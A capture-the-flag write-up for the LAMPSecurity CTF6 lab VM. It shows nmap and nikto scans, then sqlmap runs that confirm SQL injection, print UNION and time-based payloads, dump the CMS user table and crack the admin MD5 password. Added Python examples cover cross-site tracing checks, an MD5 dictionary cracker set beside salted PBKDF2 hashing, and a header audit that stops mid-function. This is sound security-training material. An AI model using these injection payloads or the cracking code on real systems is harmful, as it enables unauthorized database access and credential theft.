LAMPSECURITY: CTF6 getting root on the internal network 20211226

LAMPSECURITY: CTF6

  • Reference blog:
  • https://blog.csdn.net/weixin_42652002/article/details/112132466?spm=1001.2101.3001.6650.2&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-2.nonecase&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-2.nonecase

                                                                                                                                                                                      
┌──(root💀kwkl)-[~]
└─# nmap -n 172.16.70.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-28 23:00 HKT
Nmap scan report for 172.16.70.1
Host is up (0.00020s latency).
Not shown: 998 closed ports
PORT      STATE SERVICE
49158/tcp open  unknown
49161/tcp open  unknown
MAC Address: 00:50:56:C0:00:05 (VMware)

Nmap scan report for 172.16.70.2
Host is up (0.000059s latency).
All 1000 scanned ports on 172.16.70.2 are closed
MAC Address: 00:50:56:EE:4E:08 (VMware)

Nmap scan report for 172.16.70.141
Host is up (0.0014s latency).
Not shown: 990 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
110/tcp  open  pop3
111/tcp  open  rpcbind
143/tcp  open  imap
443/tcp  open  https
700/tcp  open  epp
993/tcp  open  imaps
995/tcp  open  pop3s
3306/tcp open  mysql
MAC Address: 00:0C:29:64:07:10 (VMware)

Nmap scan report for 172.16.70.254
Host is up (0.00015s latency).
All 1000 scanned ports on 172.16.70.254 are filtered
MAC Address: 00:50:56:E0:03:82 (VMware)

Nmap scan report for 172.16.70.122
Host is up (0.0000030s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE
3000/tcp open  ppp

Nmap done: 256 IP addresses (5 hosts up) scanned in 11.92 seconds
                                                                                                                                                                                              
┌──(root💀kwkl)-[~]
└─# /opt/nikto-master/program/nikto.pl -host 172.16.70.141
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          172.16.70.141
+ Target Hostname:    172.16.70.141
+ Target Port:        80
+ Start Time:         2021-11-28 23:11:09 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (CentOS)
+ Retrieved x-powered-by header: PHP/5.2.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ Cookie PHPSESSID created without the httponly flag
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting.
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting.
+ OSVDB-3268: /lib/: Directory indexing found.
+ OSVDB-3092: /lib/: This might be interesting.
+ Cookie roundcube_sessid created without the httponly flag
+ OSVDB-3092: /mail/: This might be interesting.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Server may leak inodes via ETags, header found with file /phpmyadmin/ChangeLog, inode: 97164, size: 35791, mtime: Thu Oct 20 05:47:44 2095
+ OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /sql/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3268: /docs/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 9068 requests: 0 error(s) and 31 item(s) reported on remote host
+ End Time:           2021-11-28 23:11:31 (GMT8) (22 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
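The two nikto findings worth acting on before anything else are OSVDB-877 (TRACE is enabled, so a TRACE response echoes the whole request back, cookies and Authorization header included, which is what cross-site tracing abuses) and the missing X-Frame-Options / X-Content-Type-Options headers together with a PHPSESSID cookie set without HttpOnly. The following is an added example, not nikto's code and nothing from the CTF6 box: it stands up a constructed loopback server that answers the way the target's Apache 2.2.3 does, runs the same checks nikto ran, then repeats them against a hardened version of the same handler. The cookie value, the canary header and the loopback port are all constructed for the example.

```python
import http.client
import http.server
import threading

SECURITY_HEADERS = ("X-Frame-Options", "X-Content-Type-Options")
CANARY = "xst-probe-7f3a"  # constructed marker we expect a TRACE response to echo


class WeakHandler(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for the Apache 2.2.3 box: TRACE is answered,
    no hardening headers, session cookie without HttpOnly."""

    def do_GET(self):
        body = b"<html>cms</html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Set-Cookie", "PHPSESSID=deadbeef; path=/")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_TRACE(self):
        # Echoing the request is exactly what makes XST work: any header the
        # browser attached (Cookie, Authorization) comes back in the body.
        body = (self.requestline + "\r\n" + str(self.headers)).encode()
        self.send_response(200)
        self.send_header("Content-Type", "message/http")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the example quiet
        pass


class HardenedHandler(WeakHandler):
    """The same server after the fixes nikto's findings call for (on Apache:
    TraceEnable off, Header always set ..., session.cookie_httponly in PHP)."""

    def do_GET(self):
        body = b"<html>cms</html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Set-Cookie", "PHPSESSID=deadbeef; path=/; HttpOnly; Secure")
        self.send_header("X-Frame-Options", "DENY")
        self.send_header("X-Content-Type-Options", "nosniff")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_TRACE(self):
        self.send_error(405)


def audit(host, port):
    """The checks behind nikto's header, cookie and OSVDB-877 findings."""
    findings = {}
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("GET", "/")
    resp = conn.getresponse()
    resp.read()
    findings["missing_headers"] = [h for h in SECURITY_HEADERS if resp.getheader(h) is None]
    cookie = resp.getheader("Set-Cookie") or ""
    findings["cookie_without_httponly"] = bool(cookie) and "httponly" not in cookie.lower()
    conn.close()

    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("TRACE", "/", headers={"X-Canary": CANARY})
    resp = conn.getresponse()
    body = resp.read().decode("latin-1")
    # XST condition: TRACE is accepted and our own request header is reflected
    findings["trace_reflects_request"] = resp.status == 200 and CANARY in body
    conn.close()
    return findings


def run_audit(handler_cls):
    """Start the given handler on a loopback port, audit it, shut it down."""
    server = http.server.HTTPServer(("127.0.0.1", 0), handler_cls)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    try:
        return audit("127.0.0.1", server.server_address[1])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("weak:", run_audit(WeakHandler))
    print("hardened:", run_audit(HardenedHandler))
```

Pointing audit() at a real host is the same call with the target's address; the canary header is what separates "TRACE returns 200" from "TRACE actually reflects the request", and only the latter is the XST finding.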
                                                                                                                                                                                              
┌──(root💀kwkl)-[~]
└─# sqlmap -u 'http://172.16.70.141/index.php?id=3'
        ___
       __H__                                                                                                                                                                                  
 ___ ___[)]_____ ___ ___  {1.5.10#stable}                                                                                                                                                     
|_ -| . [,]     | .'| . |                                                                                                                                                                     
|___|_  [,]_|_|_|__,|  _|                                                                                                                                                                     
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                  

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:13:49 /2021-11-28/

[23:13:49] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=luip1tdpjrs...vh3skavum1'). Do you want to use those [Y/n] y
[23:13:51] [INFO] checking if the target is protected by some kind of WAF/IPS
[23:13:51] [INFO] testing if the target URL content is stable
[23:13:51] [INFO] target URL content is stable
[23:13:51] [INFO] testing if GET parameter 'id' is dynamic
[23:13:51] [INFO] GET parameter 'id' appears to be dynamic
[23:13:51] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
[23:13:51] [INFO] testing for SQL injection on GET parameter 'id'
[23:13:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:13:51] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="eu")
[23:13:51] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[23:13:55] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[23:13:55] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[23:13:55] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[23:13:55] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[23:13:55] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[23:13:55] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[23:13:55] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[23:13:55] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[23:13:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[23:13:55] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[23:13:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[23:13:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[23:13:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[23:13:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[23:13:55] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[23:13:55] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[23:13:55] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[23:13:55] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[23:13:55] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[23:13:55] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[23:13:55] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[23:13:55] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[23:13:55] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[23:13:55] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[23:13:55] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[23:13:55] [INFO] testing 'Generic inline queries'
[23:13:55] [INFO] testing 'MySQL inline queries'
[23:13:55] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[23:13:55] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[23:13:55] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[23:13:55] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[23:13:55] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[23:13:55] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[23:13:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[23:14:16] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[23:14:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:14:16] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:14:16] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[23:14:16] [INFO] target URL appears to have 7 columns in query
[23:14:16] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 9068=9068

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3 AND (SELECT 1514 FROM (SELECT(SLEEP(5)))zENA)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7171,0x644c49467875614873585a5669644f7a74445a417779496e72634a56474474595a6e437542477350,0x716a6b6271)-- -
---
[23:14:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP, PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[23:14:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.70.141'

[*] ending @ 23:14:18 /2021-11-28/

                                                                                                                                                                                              
┌──(root💀kwkl)-[~]
└─# sqlmap -u 'http://172.16.70.141/index.php?id=3' --dbs
[*] starting @ 23:14:40 /2021-11-28/

[23:14:40] [INFO] resuming back-end DBMS 'mysql' 
[23:14:40] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=2dkoho3oivq...usctg4idj6'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 9068=9068

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3 AND (SELECT 1514 FROM (SELECT(SLEEP(5)))zENA)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7171,0x644c49467875614873585a5669644f7a74445a417779496e72634a56474474595a6e437542477350,0x716a6b6271)-- -
---
[23:14:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP 5.2.6, PHP, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[23:14:41] [INFO] fetching database names
available databases [5]:
[*] cms
[*] information_schema
[*] mysql
[*] roundcube
[*] test

[23:14:41] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.70.141'

[*] ending @ 23:14:41 /2021-11-28/

                                                                                                                                                                                              
┌──(root💀kwkl)-[~]
└─# sqlmap -u 'http://172.16.70.141/index.php?id=3' --current-user
[*] starting @ 23:14:52 /2021-11-28/

[23:14:52] [INFO] resuming back-end DBMS 'mysql' 
[23:14:52] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=nv6jhhpdpmi...lkt0s8psd3'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 9068=9068

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3 AND (SELECT 1514 FROM (SELECT(SLEEP(5)))zENA)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7171,0x644c49467875614873585a5669644f7a74445a417779496e72634a56474474595a6e437542477350,0x716a6b6271)-- -
---
[23:14:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP 5.2.6, PHP, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[23:14:54] [INFO] fetching current user
current user: 'cms_user@%'
[23:14:54] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.70.141'

[*] ending @ 23:14:54 /2021-11-28/

                                                                                                                                                                                              
                                                                                                                                                                                              
┌──(root💀kwkl)-[~]
└─# sqlmap -u 'http://172.16.70.141/index.php?id=3' -D cms --tables
[*] starting @ 23:15:19 /2021-11-28/

[23:15:19] [INFO] resuming back-end DBMS 'mysql' 
[23:15:19] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=0bgn1a9gu9h...nea1pq36c1'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 9068=9068

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3 AND (SELECT 1514 FROM (SELECT(SLEEP(5)))zENA)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7171,0x644c49467875614873585a5669644f7a74445a417779496e72634a56474474595a6e437542477350,0x716a6b6271)-- -
---
[23:15:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP, Apache 2.2.3, PHP 5.2.6
back-end DBMS: MySQL >= 5.0.12
[23:15:20] [INFO] fetching tables for database: 'cms'
Database: cms
[3 tables]
+-------+
| log   |
| user  |
| event |
+-------+

[23:15:20] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.70.141'

[*] ending @ 23:15:20 /2021-11-28/

                                                                                                                                                                                              
┌──(root💀kwkl)-[~]
└─# sqlmap -u 'http://172.16.70.141/index.php?id=3' -D cms -T user --dump
[*] starting @ 23:15:30 /2021-11-28/

[23:15:31] [INFO] resuming back-end DBMS 'mysql' 
[23:15:31] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=rnldshdj80n...8pkgcdsae5'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 9068=9068

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3 AND (SELECT 1514 FROM (SELECT(SLEEP(5)))zENA)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7171,0x644c49467875614873585a5669644f7a74445a417779496e72634a56474474595a6e437542477350,0x716a6b6271)-- -
---
[23:15:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP, PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[23:15:32] [INFO] fetching columns for table 'user' in database 'cms'
[23:15:32] [INFO] fetching entries for table 'user' in database 'cms'
[23:15:32] [INFO] recognized possible password hashes in column 'user_password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[23:15:33] [INFO] writing hashes to a temporary file '/tmp/sqlmap6gg64mtg25376/sqlmaphashes-57ixoe7m.txt' 
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[23:15:34] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
1
[23:15:37] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[23:15:38] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[23:15:38] [INFO] starting 12 processes 
[23:15:39] [INFO] cracked password 'adminpass' for hash '25e4ee4e9229397b6b17776bfceaf8e7'                                                                                                   
Database: cms                                                                                                                                                                                
Table: user
[1 entry]
+---------+----------------------------------------------+---------------+
| user_id | user_password                                | user_username |
+---------+----------------------------------------------+---------------+
| 1       | 25e4ee4e9229397b6b17776bfceaf8e7 (adminpass) | admin         |
+---------+----------------------------------------------+---------------+

[23:15:43] [INFO] table 'cms.`user`' dumped to CSV file '/root/.local/share/sqlmap/output/172.16.70.141/dump/cms/user.csv'
[23:15:43] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.70.141'

[*] ending @ 23:15:43 /2021-11-28/
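sqlmap cracked the cms.user hash in about a second because the CMS stores unsalted MD5: each guess costs one hash, and a table precomputed once serves every user in the dump. The block below is an added example, not sqlmap's code: a miniature of its dictionary-plus-common-suffixes attack against the same kind of hash, next to the salted, slow scheme (PBKDF2-HMAC-SHA256) that would make such a dump far less useful. The wordlist and suffix list are constructed and tiny; sqlmap's are much larger. The admin hash is the one dumped above.

```python
import hashlib
import hmac
import os

# Constructed miniature of sqlmap's default wordlist and its
# "common password suffixes" option; the real lists are much larger.
WORDLIST = ["password", "admin", "letmein", "adminpass", "welcome"]
SUFFIXES = ["", "1", "12", "123", "!", "2021"]

PAGE_HASH = "25e4ee4e9229397b6b17776bfceaf8e7"  # cms.user admin hash dumped above


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def crack_md5(target_hex, wordlist=WORDLIST, suffixes=SUFFIXES):
    """Unsalted MD5: one hash per candidate and no per-user work, so a
    dictionary with suffixes runs through millions of guesses in seconds."""
    target = target_hex.lower()
    for word in wordlist:
        for suffix in suffixes:
            candidate = word + suffix
            if md5_hex(candidate) == target:
                return candidate
    return None


def crack_many(targets, wordlist=WORDLIST, suffixes=SUFFIXES):
    """Precompute once, look up every hash: with no salt the attacker's cost
    is the same for one stolen hash or for the whole user table."""
    table = {md5_hex(w + s): w + s for w in wordlist for s in suffixes}
    return {t: table.get(t.lower()) for t in targets}


# Work factor for PBKDF2-HMAC-SHA256; the figure the OWASP Password Storage
# Cheat Sheet gives for this algorithm.
ITERATIONS = 600_000


def hash_password(password, salt=None):
    """Salted, slow hash: every guess costs ITERATIONS HMACs and the
    precomputed table above is useless because each user has its own salt."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    algo, iters, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)  # constant-time compare


if __name__ == "__main__":
    print("admin password:", crack_md5(PAGE_HASH))
    stored = hash_password("adminpass")
    print("stored form:", stored)
    print("verify:", verify_password("adminpass", stored))
```

The same wordlist against hash_password() output would need ITERATIONS hashes per candidate per user, which is the whole point of the slow, salted scheme; the MD5 path stays in the example only to show how little work the dumped hash actually cost.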

                                                                                                                                                                                              
┌──(root💀kwkl)-[~]
└─# 

┌──(root💀kwkl)-[~]
└─# /opt/nikto-master/program/nikto.pl -host 172.16.70.141

  • Nikto v2.1.6

  • Target IP: 172.16.70.141
  • Target Hostname: 172.16.70.141
  • Target Port: 80
  • Start Time: 2021-11-28 23:11:09 (GMT8)

  • Server: Apache/2.2.3 (CentOS)
  • Retrieved x-powered-by header: PHP/5.2.6
  • The anti-clickjacking X-Frame-Options header is not present.
  • The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
  • Cookie PHPSESSID created without the httponly flag
  • Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.
  • Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
  • Web Server returns a valid response with junk HTTP methods, this may cause false positives.
  • OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
  • OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  • OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  • OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  • OSVDB-3268: /css/: Directory indexing found.
  • OSVDB-3092: /css/: This might be interesting.
  • OSVDB-3268: /files/: Directory indexing found.
  • OSVDB-3092: /files/: This might be interesting.
  • OSVDB-3268: /lib/: Directory indexing found.
  • OSVDB-3092: /lib/: This might be interesting.
  • Cookie roundcube_sessid created without the httponly flag
  • OSVDB-3092: /mail/: This might be interesting.
  • OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
  • Server may leak inodes via ETags, header found with file /phpmyadmin/ChangeLog, inode: 97164, size: 35791, mtime: Thu Oct 20 05:47:44 2095
  • OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
  • OSVDB-3268: /sql/: Directory indexing found.
  • OSVDB-3092: /manual/: Web server manual found.
  • OSVDB-3268: /icons/: Directory indexing found.
  • OSVDB-3268: /manual/images/: Directory indexing found.
  • OSVDB-3268: /docs/: Directory indexing found.
  • OSVDB-3233: /icons/README: Apache default file found.
  • /phpmyadmin/: phpMyAdmin directory found
  • OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
  • OSVDB-3092: /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
  • 9068 requests: 0 error(s) and 31 item(s) reported on remote host
  • End Time: 2021-11-28 23:11:31 (GMT8) (22 seconds)

  • 1 host(s) tested
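Most of the Nikto items above are response-header hygiene (no X-Frame-Options, no X-Content-Type-Options, session cookies without HttpOnly, TRACE still allowed, an Apache 2.2.3 banner). As an added example, not part of this write-up or of Nikto, the script below parses a raw HTTP response and reports those same findings, so the check can be re-run after hardening. Both responses are constructed inline; the weak one mirrors what Nikto reported, the hardened one is what a fixed server should send.

```python
"""Audit one raw HTTP response for the header weaknesses Nikto reported.

Added example (not from the write-up). Both responses below are
constructed: RAW_WEAK mirrors the Nikto findings above, RAW_HARDENED is
the corrected form.
"""
import re

# Constructed sample matching the scanned host: Apache/2.2.3, PHP/5.2.6,
# TRACE enabled, two session cookies without HttpOnly, no anti-framing headers.
RAW_WEAK = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.3 (CentOS)\r\n"
    "X-Powered-By: PHP/5.2.6\r\n"
    "Set-Cookie: PHPSESSID=8k7s0c8hh8h; path=/\r\n"
    "Set-Cookie: roundcube_sessid=abc123; path=/mail\r\n"
    "Allow: GET, HEAD, POST, OPTIONS, TRACE\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html></html>"
)

# Constructed sample of the hardened response.
RAW_HARDENED = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: PHPSESSID=8k7s0c8hh8h; path=/; HttpOnly; Secure; SameSite=Lax\r\n"
    "Allow: GET, HEAD, POST, OPTIONS\r\n"
    "X-Frame-Options: DENY\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)


def parse_headers(raw):
    """Return {lower-case name: [values]} for the header block of a raw response."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def _version_tuple(banner):
    """Extract (major, minor, patch) from a banner such as 'Apache/2.2.3 (CentOS)'."""
    m = re.search(r"/(\d+(?:\.\d+)+)", banner)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def audit(raw, apache_min=(2, 4, 46)):
    """Return a sorted list of finding strings for one raw HTTP response."""
    h = parse_headers(raw)
    findings = []
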